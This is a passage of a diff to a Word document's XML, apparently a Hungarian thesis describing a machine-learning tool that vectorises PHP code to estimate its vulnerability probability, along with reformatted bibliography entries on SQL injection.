+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gyűjti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, aminek a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hosszát később módosítja a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>max_length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Másrészt a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.oszlopának</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bináris számain is, amiket pedig az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">y </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba tesz.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="1134"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
+            <wp:extent cx="3784795" cy="1892397"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="23" name="Kép 23"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3784795" cy="1892397"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">X[40] </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[40</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>eredménye</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">y </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>40.eleme</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 40.sorának felel meg, ami ekvivalens a 3.3-as ábrával</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> felcímkézés után</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>saveVectorAs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metódus, ami az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> változókat lementi egy-egy .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>npy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlba.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy olyan .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>npy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlt hoz létre, amit később egy osztályozási algoritmus tud használni.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Kifejtve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>trainer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>grafikus felület</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14853,6 +19732,56 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="dto3"/>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A korábbi összefoglalóban leírtak alapján kijelenthető, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> program </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a bemenetként megadott PHP kódra kimenetként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">meghatározza azt, hogy a kód milyen valószínűséggel sérülékeny. </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15046,13 +19975,59 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Error Based SQL Injection (SQLi)</w:t>
+        <w:t>Error</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SQLi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15102,13 +20077,77 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Beginner Guide to SQL Injection Boolean Based (Part 2)</w:t>
+        <w:t>Beginner</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Guide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection Boolean </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Part 2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15164,7 +20203,61 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Time Based Blind SQL Injection (SQLi)</w:t>
+        <w:t xml:space="preserve">Time </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SQLi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15214,14 +20307,106 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Blind Out-of-band SQL Injection vulnerability testing added to AcuMonitor</w:t>
-      </w:r>
+        <w:t>Blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Out-of-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> testing </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>added</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AcuMonitor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15276,8 +20461,54 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Mike Shema 2012. SQL Injection &amp; Data Store Manipulation</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Mike </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Shema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2012. SQL Injection &amp; Data </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Store</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Manipulation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15332,8 +20563,54 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SQL Injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Prevention</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Cheat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Sheet</w:t>
